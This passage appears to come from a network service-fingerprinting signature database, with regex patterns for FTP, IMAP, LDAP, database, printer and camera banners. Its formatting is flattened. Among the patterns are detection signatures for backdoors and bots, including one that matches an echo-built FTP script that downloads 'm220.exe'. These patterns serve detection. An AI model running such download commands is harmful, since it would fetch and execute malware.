1\.0 to 3\.0\0Fpostmaster\.c\0L1497\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1507\0RProcessStartupPacket\0\0 +E\0\0\0\x9dSFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0F\.\\src\\backend\\postmaster\\postmaster\.c\0L1507\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1570\0RProcessStartupPacket\0\0 +E\0\0\0\x9dSFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0F\.\\src\\backend\\postmaster\\postmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x94SFATAL\0C0A000\0MProtocole non support\?e de l'interface 65363\.19778 : le serveur supporte de 1\.0 \?\n3\.0\0Fpostmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1666\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1694\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1695\0RProcessStartupPacket\0\0 +\0\0\0\sequence_number=\[0\] result=\[-2005\] \0 +\0\0\0\x0e\*\*DPTMMSG\*\*\0\0\xf8 +\0\0\0.\xffSMBr\0\0\0\0\x80|s p|Nortel/D-Link router instant setup +\xcd\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x02\0\0\0\0\0 +\0\0\0\x152999 Invalid command\n\xff\xff\xff\xfc +\0\0\0\x0b3999 No go\n +2[23]0 FTP Server Ready\r\n504 Comand length not supported\.\r\n +\0\0\x02\0\0\0\0\0\0\0\0\0\r\0\0\0\0.......International Business Machines Corp\. +\0\x01\0\x03\0\0\0/Incompatible version number: message discarded\. +\x01\0\x0b\0\0.....\0\0\0\0.*Sun Microsystems, Inc\. +\x01\0\x0b\0\0.*Conectiva Linux \(XFree86 ([\d.]+), patch level (\w+)\) +\0J\x0b\0\0...This copy of X-Win32 will only accept connections from network ([\d.]+)\0\0 +\x01\0\x0b\0\0.....\0\0\0\0.*HDS Network Systems, Inc\. \(([^)]+)\) +\0\0\x02\0\0\0\x01\0\x04\0\0\0\0\r([\w._-]+):\d+\0\x07\0\0\0\0 \x10\0,\x1a\0\0X\.Org Foundation\x01\n\x01\0\x05\0\0\0\xe6\xbf\xc0\xb5\0\0\0\0\0\0\0\0 +GIOP\x01\0\x01\x06\0\0\0\0 +\x80\xf0\x80\x12\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01 +RTSP/1\.0 400 Bad Request\r\nServer: AirTunes/([\w._-]+)\r\n\r\n +\0 +default: unknown printer\n +VSE Line Printer Daemon has rejected this request\.\0\0 +no queue to check\n\0 +EXM {EXC \0\x1fcom\.rbnb\.api\.SerializeExceptionMSG \0JUnrecognizable parameter read from input stream\.\nElement read was \x01default}\r\nPNG {}\r\n| p/Ring Buffered Network Bus/ i|http://outlet.creare.com/rbnb/ +\x02rFactorMonitor\x000400\0 +\0\0\0\t51000000\0\0\0\0[^\0] +0%\x02\x01\x01a \n\x010\x04\0\x04\x19anonymous bind disallowed +02\x02\x01\x01a-\n\x01\x02\x04\0\x04&requested protocol version not allowed +0E\x02\x01\x01a@\n\x01\x02\x04\0\x049historical protocol version requested, use LDAPv3 instead +0\x84\0\0\0I\x02\x01\x01a\x84\0\0\0@\n\x01\x02\x04\0\x049historical protocol version requested, use LDAPv3 instead +0\x1a\x02\x01\x01a\x15\n\x01\0\x04\0\x04\x0eanonymous bind +0\x84\0\0\0\x10\x02\x01\x01a\x84\0\0\0\x07\n\x01\0\x04\0\x04\0 +0\.\x02\x01\x01a\)\n\x010\x04\0\x04\"Failed, anonymous bind not allowed +0&\x02\x01\x01a!\n\x01\x02\x04\0\x04\x1aOnly LDAP v3 is supported\. +0\x1a\x02\x01\x01a\x15\n\x01\0\x04\0\x04\x0eBind succeeded + +TNMP\x16\0\0\0TNME\x80\0\xfe\xff..([\w.]+):(\d) +\0\x04\0 +TNMP.\0\0\0TNME.\0\0\0USER.\x07\x04\0\x08\0.{9}\0P\0\x03\0U\0\xff\xff\0.*Desktop Manager ([\d.]+)\0 +ActiveFax Server: Es befinden sich insgesamt +\x03\0\x26 +no entries\n +Host Name: ([-\w_.]+)\nPrinter Device: hp LaserJet (\w+)\nPrinter Status: ([^\r\n]+)\n\0\0 +\x03\0\0\x0b\x06\xd0\0\0\x12.\0 +\x03\0\0\x0b\x06\xd0\0\0\x03.\0 +\x03\0\0\x0e\t\xd0\0\0\0[\x02\xa1]\0\xc0\x01\n +\x03\0\0\x0b\x06\xd0\0\x004\x12\0 +.\0\x01.....\0([^\0]+)\0 +\0\0 +\x74\x4e\x63\x50\0\0\0\x10\x33\x33 +\0\0\0\x01\0\x17\0\x14\0\x06\0\0\0.\0\0\0\0\0\0 +.\0\0\0.\0\0\0\x03\0\0@\x02\x0f\0.*\x03\0\0\0\0\x02\0/\0.\0\0\0\0\0\0\0.*CN=([-.\w ]+)/OU=([-.\w ]+)/OU=([-.\w ]+)/O=([-.\w ]+)|s p/Lotus Domino server/ i|CN=1;OU=2/3;Org=4 +\x02\0\0\0\0\0\0/\0\0\0\0\0\0\0\0\0@\x1f\0\0\0\0\0\0\0\0\0/\0\0\0\x02\0\0@\x02\x0f\0\x01\0=\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\)\0\0\0 +\x18\0\x01\x02Invalid packet length\0 +{\"error\":{\"code\":-32700,\"message\":\"Parse error\.\"},\"id\":null,\"jsonrpc\":\"([\w._-]+)\"} +\x02\x06 +\x01\x01\0\xfd\xce\xfa\x0b\xb0\xa0\0\0\0\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x12 +HTTP/1\.0 400 Bad Request\r\nDate: .*\r\nServer: Boa/([\w._-]+)\r\nConnection: close\r\nContent-Type: text/html\r\n\r\n400 Bad Request\n

400 Bad Request

\nYour client has issued a malformed or illegal request\.\n\n +\0.\0\0\x02\0\0\0.*\(IAGENT = \(AGENT_VERSION = ([\d.]+)\)\(RPC_VERSION = ([\d.]+)\)\) +\0\x20\0\0\x02\0\0\0\x016\0\0\x08\0\x7f\xff\x01\0\0\0\0\x20 +\0.\0\0[\x02\x04]\0\0\0 +\0,\0\0\x04\0\0\0\"\0\0 \(CONNECT_DATA=\(COMMAND=version\)\) +S\xf5\xc6\x1a{ +\0\0\0H\0\0\0\x02.[^\0]*\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\* ACAP \(IMPLEMENTATION \"CommuniGate Pro ACAP (\d[-.\w]+)\"\) +.\0\x01\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0.*\0\0\0 +\+Welcome to Ability FTP Server \(Admin\)\. \[20500\]\r\n +200 NOD32SS ([\d.]+) \((\d+)\)\r\n + +\x01\xff\0\xff\x01\x1d\0\xfd\0\n\x03\x05A\+ API \(([\d.]+)\) - CCS \(([\d.]+)\)\0 +\x80\x01\0\x80\0\x80\0\0\xe5az\xcb\0\0\0\0J...............\x02\0\x01\0\0<\x01,.......\0...\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\x01\x04\0.\0\x80\x08 +\0`\0\x04\0\0\0\x1810\x000\x000\x00852224\0\0\0\0\0\0\0\0\0\0\0 +MCOP\0\0\0.\0\0\0\x01\0\0\0\x10aRts/MCOP-([\d.]+)\0\0\0\0 +Asterisk Call Manager/([\d.]+)\r\n +Response: Follows\r\nPrivilege: Command\r\n--END COMMAND--\r\n +220 jeem\.mail\.pv ESMTP\r\n +\r\nUser Access Verification\r\n\r\nYour PassWord: +echo o [\d.]+ \d+ >s\r\necho common>> s\r\necho common>> s\r\necho bin>> s\r\necho get m220\.exe +220 Bot Server \(Win32\)\r\n +PWD +=+\n= +RBackdoor ([\d.]+) +220 Windrone Server \(Win32\)\r\n +220 Reptile welcomes you\.\.\r\n +MZ\x90\0\x03\0\0\0\x04\0\0\0\xff\xff\0\0\xb8\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0fn\0\0\xd0\0\0\0\x0e\x1f\xba\x0e\0\xb4\t\xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode\. +220 SSL Connection Established - Loading Protocol\.\.\.\.\r\n +A-311 Death welcome\x001 +\x01\0\0\0 +HTTP/1\.0 401 Authorization Required\r\n.*Server: bitcoin-json-rpc\r\n +0x[0-9a-fA-F]{32}L +\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=1 +\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=0 +\\0\0\0\\0\0\x000RAR\0 \0\0.\xe2\x02\0\xc4G\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x19\0\0\0\0\0\x0f\xbeB!\x012\x02\xd1\x02\x032\x02p\0\x062\x02\x80\0 +BZFS\d\d\d\d\r\n\r\n +ACK\x01 +\x8d\0\0\0\x8d\0\0\0\x100\x81\x89\x02\x81\x81\0.*\x02\x03\x01\0\x01\0 +\x02\x07\x04\0\xe0\0\0\0\0\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x04\x03\x02\x010\0\0\0\0\0\0\0\x01\0\0\0\x01\0\0\0\xe0\0\0\0\0\0\0\0\0\x80\0\0\0\x80\0\0\0hfnapp04\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\x02\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\*\x01..\0\x04\0\0\0\x01 +Cirrato Client ([\w._-]+)\0 +200.*Citadel(?:/UX)? +\x7f\x7fICA\0\x7f\x7fICA\0 +.\0\0\0\x81\0\0\0\x01 +\0\0\0\x10ClsBoolVersion 1 +CFMSERV\(1\)\n +Concerto Software\r\n\r\nEnsemblePro SendLog Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> +Concerto Software\r\n\r\nContactPro TimeSync Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> +\x10\x06[\x80-\xff].......\x0b\x01([\w._-]+)\0 +Crestron Terminal Protocol Console opened\r\n +\r\nCrestron Terminal Protocol Console Opened\r\n\r\n +\x0f\0\x01\x02 +/usr/sbin/cvs-pserver: line \d+: .*cvs: No such file or directory\n +\d\d:\d\d:\d\d [AP]M \d\d\d\d/\d\d/\d\d\n +\d\d\d\d/\d\d/\d\d \d\d:\d\d:\d\d\r\n +\xaf\x01 +220 ([-.\w]+) dictd ([-.\w/]+) on ([-.+ \w]+) +0000019a[0-9a-f]{402}\r\n +220 DSPAM DLMTP ([\w._-]+) Authentication Required\r\n +\0\0\0\x0c\0\0\0\?\0\0\0\x02 +0 PROTOCOL 2 [23] AGENT,CONSOLE,INSTALL +\?p\xf7/Zq\xa2\xf5\x03.......\xf4\xea.......B +\(m\xe9l@k\xb7\xf5\x03 +\(m\xe9l@k\xb3\xf7\x1e\xa5 +\(m\xe9l@k\xb1\xf1\x15\xa5 +\?\x008 \xc3p EFTSRV1 ([\d.]+) +\x00\x00\x03\x72<\?xml version=\"1\.0\" encoding=\"UTF-8\" standalone=\"no\" \?>\n\n\n \n ([^<]+)\n .*\n \n ([\w._-]+)\n +7\0\0\0~\0\0\0\0\x14\x06\x04\xe8\x99\x02\0\x05\xeb\0\x04\xdf\x92\0\0\n\xd7\xa3p=\n\xd7\x18@\x04\x95\xf1\x01\0\x13\x13EVE-EVE-RELEASE@ccp +Windows NT Version ([\d.]+) build (\d+), \d+ processors? \(.*\)\r\nFingerDW V([\d.]+) - Hummingbird Ltd\.\n +\r\nIntegrated port\r\nPrinter Type: Lexmark T642\r\nPrint Job Status: +Welcome to FreeVCS MSSQL NT Service\r\n +Welcome to FreeVCS DBISAM NT Service\r\n +FB/([\d.]+) PUSH: SERVER_READY ([\w._-]+) (\w+)\n +220 ([-/.+\w]+) FTP server \(SecureTransport (\d[-.\w]+)\) ready\.\r\n +220 3Com 3CDaemon FTP Server Version (\d[-.\w]+)\r\n +220-GuildFTPd FTP Server \(c\) \d\d\d\d(?:-\d\d\d\d)?\r\n220-Version (\d[-.\w]+)\r\n +530 Connection refused, unknown IP address\.\r\n +220 IIS ([\w._-]+) FTP\r\n +220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\.\r\n +220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\r\n +220 WFTPD (\d[-.\w]+) service \(by Texas Imperial Software\) ready for new user\r\n +220 ([-.+\w]+) FTP server \(Version [\d.]+\+Heimdal (\d[-+.\w ]+)\) ready\.\r\n +500 OOPS: (could not bind listening IPv4 socket)\r\n +500 OOPS: vsftpd: (.*)\r\n +220[- ]FileZilla Server version (\d[-.\w ]+)\r\n +220 ([-\w_.]+) running FileZilla Server version (\d[-.\w ]+)\r\n +220.*\r\n220[- ]FileZilla Server version (\d[-.\w ]+)\r\n +220-.*\r\n220-\r\n220 using FileZilla FileZilla Server version ([^\r\n]+)\r\n +220-FileZilla Server\r\n +431 Could not initialize SSL connection\r\n +220 AXIS ([\w._-]+) Network Camera ([\w._-]+ \(\w+ \d+ \d+\)) ready\.\r\n +220 AXIS StorPoint CD E100 CD-ROM Server V([\d.]+) .* ready\.\r\n +220 AXIS (.+) FTP Network Print Server V([-\w_.]+) +220 AXIS (\w+) Network Fixed Dome Camera (.*) ready\.\r\n +220-Cerberus FTP Server Personal Edition\r\n220-UNREGISTERED\r\n +220-Cerberus FTP Server - Personal Edition\r\n220-UNREGISTERED\r\n220-Welcome to Cerberus FTP Server\r\n220 Created by Grant Averett\r\n +220[ -].*FTP server \(lukemftpd (\d[-. \w]+)\) ready\.\r\n +220[ -]Serv-U FTP[ -]Server v([\w._-]+) +220-Serv-U FTP Server for Winsock\r\n +220-FTP Server v([\d.]+) for WinSock ready\. +431 Unable to negotiate secure command connection\.\r\n +220-FTP Server ready\r\n220-Use USER user@host for native FTP proxy\r\n220 Your FTP Session will expire after 300 seconds of inactivity\.\r\n +220 JD FTP Server Ready +220 ([-.\w]+) FTP server \(Version ([-.+\w()]+)\) ready\.\r\n +220 Server \(ProFTPD\) \[([-.\w]+)\]\r\n +220 ProFTPD (\d\S+) Server +220 FTP Server \[([-\w_.]+)\]\r\n +220.*ProFTP[dD].*Server ready +220 ProFTP Server Ready\r\n +220 Welcome @ my\.ftp\.org\r\n +220 .* FTP Server \(ProFTPD ([\d.]+) on Red Hat linux ([\d.]+)\) ready\.\r\n +220 ProFTP-Server auf ([-\w_.]+)\r\n +220.*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD\) +220 FTP Server ready\.\r\n +220.*NcFTPd Server +220 ([-\w_.]+) FTP server \(SunOS 5\.([789])\) ready +220 VxWorks FTP server \(VxWorks ?([\d.]+) - Secure NetLinx version \(([\d.]+)\)\) ready\.\r\n| p|AMX NetLinx A/V control system ftpd +220[- ]FTP server ready\.\r\n.*214 Pure-FTPd - http://pureftpd\.org/?\r\n +220---------- Welcome to Pure-FTPd \[privsep\] \[TLS\] ----------\r\n220-You are user number| p/Pure-FTPd/ i|with SSL/TLS +220 ready, dude \(vsFTPd (\d[0-9.]+): beat me, break me\)\r\n +220 TYPSoft FTP Server (\d\S+) ready\.\.\.\r\n +220- Welcome to this Xitami FTP server, running version ([\d\w.]+) of Xitami\. \n You are user number (\d+) of a permitted (\d+) users\.| p/Xitami ftpd/ v/1/ i|2/3 users +220 Service Ready for new User\r\n +220 ([-\w]+) FTP server \(NetWare (v[\d.]+)\) ready\.\r\n +220 ([-.+\w]+) FTP SERVICE ready\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n +220 FTP server \(Hummingbird Ltd\. \(HCLFTPD\) Version ([\d.]+)\) ready\.\r\n +220-\r\n Your connection logged!\r\n220 ([\w_.-]+) FTP server \(NetBSD-ftpd 200\d+\) ready\.\r\n +220 CommuniGate Pro FTP Server ([\d.]+) ready\r\n +(?:220.*\r\n)?220 [Ee]valine FTP server \(Version: Mac OS X +220 WinGate Engine FTP Gateway ready\r\n +220 Welcome to Quick 'n Easy FTP Server\r\n +421 Too many connections for this IP address, please try again later\.\r\n +220 Canon EB-65 FTP Print Server V([\d.]+) .* ready\.\r\n +500 OOPS: .*\r\n +500 OOPS: vsftpd: both local and anonymous access disabled!\r\n +220 lankacom FTP server \(MikroTik v?([\w._-]+)\) ready\r\n +220 AL-(\w+)-[0-9A-F]+ FTP server \(OEM FTPD version ([\d.]+)\) ready\.\r\n +220 ioFTPD \[www: http://www\.ioftpd\.com\] - \[version: ([-\w_. ]+)\] server ready\.\r\n +220 CesarFTP ([\w.]+) Server Welcome !\r\n +220 CesarFTP ([\w.]+) \xb7\xfe\xce\xf1\xc6\xf7\xbb\xb6\xd3\xad !\r\n +220 BlackMoon FTP Server - Free Edition - Version ([\d.]+)\. Service Ready\r\n +220 netapp ftp server\r\n +220 ([-\w_.]+) FTP server \(OSF/1 Version ([\d.]+)\) ready\.\r\n| p|OSF/1 ftpd| i|OSF/1 2 +220 ([\w._-]+) FTP server ready\.\.\.\r\n +220-TYPSoft FTP Server ([\d.]+) ready\.\.\.\r\n +220 OKI-([\w+]+) Version ([\d.]+) ready\.\r\n +220 ShareIt FTP Pro ([\d.]+) \(WINCE\) Ready\.\r\n +220 ISOS FTP Server for Upgrade Purpose \(([\d.]+)\) ready\r\n +220 PV11 FTP Server ready\r\n +220 Alize Session Manager FTP Server\r\n +220-FTP Server ready\r\n220-Welcome to the Sambar FTP Server\r\r\n +220 DataHive FTP Server ([\d.]+) Ready\.\r\n +220 copier2FTP server ready\.\r\n +220 DrayTek FTP version ([\d.]+)\r\n +220 ([-\w_.]+) FTP server ready \(mod_ftpd/([\d.]+)\)\r\n +220 DELL1700n Dell Laser Printer 1700n FTP Server ([\w.]+) ready\.\r\n +220 Dell Laser Printer 3100cn\r\n +220 \w+ Dell Laser Printer M5200 FTP Server ([\d.]+) ready\.\r\n +220 Welcome to the dvd2xbox ftp server\.\r\n +220 Welcome To WinEggDrop Tiny FTP Server\r\n +220 NRG (\w+) FTP server \(([\d.]+)\) ready\.\r\n +220 wzd server ready\.\r\n +500 Sorry, no server available to handle request on ([-\w_.:]+)\r\n +220 NET\+ARM FTP Server ([\d.]+) ready\.\r\n +220 Connected to ([-\w_.]+) ready\.\.\.\r\n +220 NETWORK HDD FTP Server ready\.\r\n +220 Blue Coat FTP Service\r\n +220 Homer Ftp Server\r\n +220 Personal FTP Server ready\r\n +220 Golden FTP Server PRO ready v([\w._-]+)\r\n +220 IBM TCP/IP for OS/2 - FTP Server ver ([\d:.]+) on .* ready\.\r\n| p|IBM OS/2 ftpd| v/1/ o|OS/2 +220 AudioVAULT FTP server\r\n +220 .* Server \(vftpd ([\d.]+)\) ready\.\r\n +220-TwoFTPd server ready\.\r\n220 Authenticate first\.\r\n +220 \(Ver\. ([^)]+)\) [A-Z][a-z]{2} \d+ 20\d+ ready\.\r\n| p|Canon VB-C10/VB-C10R webcam ftpd +220 Cisco \(([\d.]+)\) FTP server ready\r\n +220 \"Global Site Selector FTP\"\r\n +220 Willkomen auf Ihrer Dreambox\.\r\n +Error loading /etc/ssl/certs/ftpd\.pem: +220 FTP server \(Medusa Async V([\d.]+) \[experimental\]\) ready\.\r\n +220 ([-\w_.]+) \(Aironet (BR\w+) V([\d.]+)\) ready\r\n +220-Welcome To Rumpus!\r\n220 Service ready for new user\r\n +220 IB-23 Ver ([\d.]+) FTP server\.\r\n +220 Disk Station FTP server at ([-\w_.]+) ready\.\r\n +refused in\.ftpd from [-\w_.]+ logged\n +220 Xlight Server ([\d.]+) ready\.\.\. \r\n +220 FS-3820N FTP server\.\r\n +220 Scala FTP \(\"Scala InfoChannel Player \d+\" ([\w/.]+)\)\r\n +220 RICOH Aficio MP C2500 FTP server \(([\d.]+)\) ready\.\r\n +220 FTP Services for ClearPath MCP: Server version ([\d.]+)\r\n +ftpd - accept the connection from [\d.]+\n220-eDVR FTP Server v([\d.]+) \(c\)Copyright WebGate Inc\. \w+-\w+\r\n220-Welcome to (DS\w+)\r\n220 You will be disconnected after 180 seconds of inactivity\.\r\n +220 Canon iN-E5 FTP Print Server V([-\w_.]+) +220 FTP-Backupspace\r\n +220 zFTPServer v([-\w_.]+), build ([-\d]+) +220 HP166XC V([-\w_.]+) FUSION FTP server \(Version ([-\w_.]+)\) ready\.\r\n +220 FTP Server, type 'quote help' for help\r\n +550 no more people, max connections is reached\r\n +220 RICOH Aficio SP C811DN FTP server \(([-\w_.]+)\) ready\.\r\n +220 Microtest SuperCD-cdserver FTP server \(Version V([\w._-]+)\) ready\.\r\n +220 Belkin Network USB Hub Ver ([\w._-]+) FTP server\.\r\n +220-TCP/IP for VSE FTP Daemon Version ([\w._-]+) +220 FTP server: Lexmark Optra LaserPrinter ready\r\n +220 NSE \(AG 5000 v([\w._-]+)\) FTP server ready\r\n +220 TOSHIBA e-STUDIO5500c FTP server \(([\w._-]+)\) ready\.\r\n +220 ([\w._-]+) FTP server \(EMC-SNAS: ([\w._-]+)\) ready\.\r\n +220-CentOS release ([\w._-]+) .*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD Default Installation\) +.* klogd: klogd started: BusyBox v([\w._-]+) \(.*\)\r\nDoing BRCTL \.\.\.\r\nsetfilter br0 0 \r\n/var/tmp/act_firewall: No such file or directory\r\n +220.* GlobalSCAPE Secure FTP Server \(v\. ([^\)]+)\) +220 Welcome to Ocean FTP Server. +220 4dftp .* FTP Service \(Version ([^)]+)\) +220 IBM NPS 540\+/542\+ FTP Printer Server V([\w._-]+) | p|IBM NPS 540+/542+ print server ftpd +220 SAVIN 8055 FTP server \(([\w._-]+)\) ready\.\r\n +421 Closing non-secure connections in Secure Mode\. \r\n +220 DrFTPD\+ ([\w._-]+) \(\+STABLE\+\) \Revision: (\d+) \ http://drftpd\.org\r\n +220 Conti FTP Server ready\r\n +220 Welcome to Mobile File Service\r\n\r\n| p|HTC P4000 PDA/Phone ftpd +220 ([\w._-]+) FTP server \(WS2000 FTPD Server\) ready\.\r\n| p|Motorola/Symbol WS2000 WAP ftpd +220- \w+\r\n220 FTP Server powered by: Quick 'n Easy FTP Server\r\n +220 Welcome to the NSLU2 vsftp daemon\.\r\n +220 Star IFBD-HE05/06 FTP Server\.\r\n +220 Welcome to Baby FTP Server\r\n +220 ([\w_.-]+) FTP server \(witelcom ([\d.]+)\) ready\r\n +220 FTP Server \(ZyWALL (USG \w+)\) \[[\w._-]+\]\r\n +220 ALFTP Server ready\. \^-\^\)/~\r\n +220 vxTarget FTP server \(VxWorks ([\d.]+)\) ready\.\r\n +220 ET(\w+) ([\w-]+) Series FTP Server ready\.\r\n +220 aFTPServer ready \(cwd is /\)\r\n +220 FTP version ([\w.]+)\r\n +220 pyftpdlib ([\w._-]+) ready\.\r\n +220 ([\w._-]+) FTP SERVER T9552G07 \(Version ([\w._-]+) TANDEM ([\w._-]+)\) ready\.\r\n +220 [\w._-]+Citizen_CLP([\w._-]+) FTP server \(InterCon version ([\w._-]+)\) ready\.\n +220 Nucleus FTP Server \(Version ([\w._-]+)\) ready\.\r\n +220 Wing FTP Server ([\w._-]+) ready\.\.\.\r\n +220 OpenFTPD server([^ ]+)? +220 Ftp service of Jana-Server ready\r\n +220 Frox transparent ftp proxy\. Login with username\[@host\[:port\]\]\r\n +501 Proxy unable to contact ftp server\r\n +220 ([-.+\w]+) FTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n +220-Sidewinder ftp proxy\. You must login to the proxy first +220 webshield2 FTP proxy ready\.\r\n +220 WinProxy \(Version ([^)]+)\) ready\.\r\n +220 ([-\w_.]+) FTP proxy \(Version V([\d.]+)\) ready\.\r\n +220 Finjan SurfinGate Proxy - Server Ready\.\r\n +220- ([-\w_.]+) PROXY-FTP server \(DeleGate/([\d.]+)\) ready\.\r\n +500 WinGate Engine Access Denied\r\n +220 IWSS FTP proxy ready\r\n +220 FTP proxy \(v([\d.]+)\) ready\r\n530 Login incorrect\. Expected USER command\r\n +220-Welcome to SpoonProxy V([\w._-]+) by Pi-Soft Consulting, LLC\r\n +220-CCProxy FTP Service\(Unregistered\)\r\n +220 kingate\(([\w._-]+)-win32\) ftp proxy ready\r\n +220 FileCatalyst Server Enterprise v([^\r\n]*)\r\n +220 ([\w._-]+), KEN! DSL FTP-Gateway\r\n +421 Service not available \(The FTP server is not responding\.\)\n +220 (\S+) SVDRP VideoDiskRecorder (\d[^\;]+); +220-\r?\n220 - ftp +\0\0\0\\\x80\x06\0\0\0\n\x01\x03\0\x01\x86\xaf\0\0\0\n\x10\x03\0\0\0\x01\0\0\0\x15\x11\x05FSAE server ([\d.]+)\0\0\0\x16\x12\x01................\0\0\0\x17\x13\x01FSAE_SERVER_\d+ +\0Check Point FireWall-1 authenticated RLogin server running on ([-.\w]+)\r\n\r +220 Fyre rendering server ready\n +\0\0\0\t\0\0\0\x80\0\0\0\0\0\0\0\0\0\0\x042\0\0\0\x01\0\0\t_\0\0\0h +HELLO_BOT\r\n +HELLO_CONTROL_SERVER\r\n +\xff\xfe\x01Genetec Integration Service \(STUDENT03\)\r\n\r\n\r\n\r\n========================================================================\r\n Integration Service Main Menu\r\n========================================================================\r\n\r\n 1\) CONFIG\r\n Displays the configuration settings for the service\r\n\r\n 2\) STATUS\r\n Displays the status of the external systems being run by this\r\n service\.\r\n\r\n \?\) Help\r\n\r\n x\) Exit\r\n========================================================================\r\n +%%QU%%QU%%QU +\nClient limit exceeded\.\n +3Connection to [\d.]+ is denied -- no authorization\.\r\n +GIOP\x01...\0\0\0\0 +\x03\0\0.*@ +\xff\xfd.| p|GNU Gatekeeper +Helpdesk Advanced ([\d.]+) License Logging Service +\(\0\0\0\0\0\0\0..`\0\x01\xff\xff\xff\xcc\xfa\x85\0C\x1d\xe6whfnk\.\.\.E\0\0\0\0\0\0\0\0 +HTTP/1\.1 400 Bad Request\r\n.*\r\n\r\n

Bad Request \(Invalid Verb\)

+HTTP/1\.0 400 Bad Request\r\nContent-Type: text/html\r\nPragma: no-cache\r\nConnection: close\r\nContent-Type: text/html; charset=us-ascii\r\n\r\nInvalid request


This message was created by Kerio Control Proxy {665} +220 JetDirect GGW server \(version (\d[\d.]+)\) ready\r\n +220 HP GGW server \(version ([\w._-]+)\) ready\r\n\0 +00 +01 +\xab\xab\xab\xab\xa0\x81\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x13\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\r\n Welcome To\r\n ichat ROOMS (\d[-.\w]+)\r\n== +IceP\x01\0\x01\0\x03\0\x0e\0\0\0 +flock\(\) on closed filehandle .*midentd +\"\0\x04\0 +IUSB \0\0\0\x007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xf1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\* OK ([-/.+\w]+) Solstice \(tm\) Internet Mail Server \(tm\) (\d[-.\w]+) IMAP4 service - at +\* OK GroupWise IMAP4rev1 Server Ready\r\n +\* OK \[CAPABILITY IMAP4rev1 .*\] GroupWise Server Ready\r\n +\* OK dbmail imap \(protocol version 4r1\) server (\d[-.\w]+) ready to run\r\n +\* OK ([-.+\w]+) NetMail IMAP4 Agent server ready +\* OK IMAP4 Server \(IMail ([-.\w]+)\) +\* OK ([-.+\w]+) IMAP4rev1 Mercury/32 v(\d[-.\w]+) server ready\.\r\n| p|Mercury/32 imapd +\* OK ([-.\w]+) IMAP4 service \(Netscape Messaging Server (\d[-.\w ]+) \(built ([\w ]+)\)\)\r\n +\* OK eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) IMAP4 server started\r\n +\* OK ([-.\w]+) NetMail IMAP4 Agent server ready <.*>\r\n +\* OK 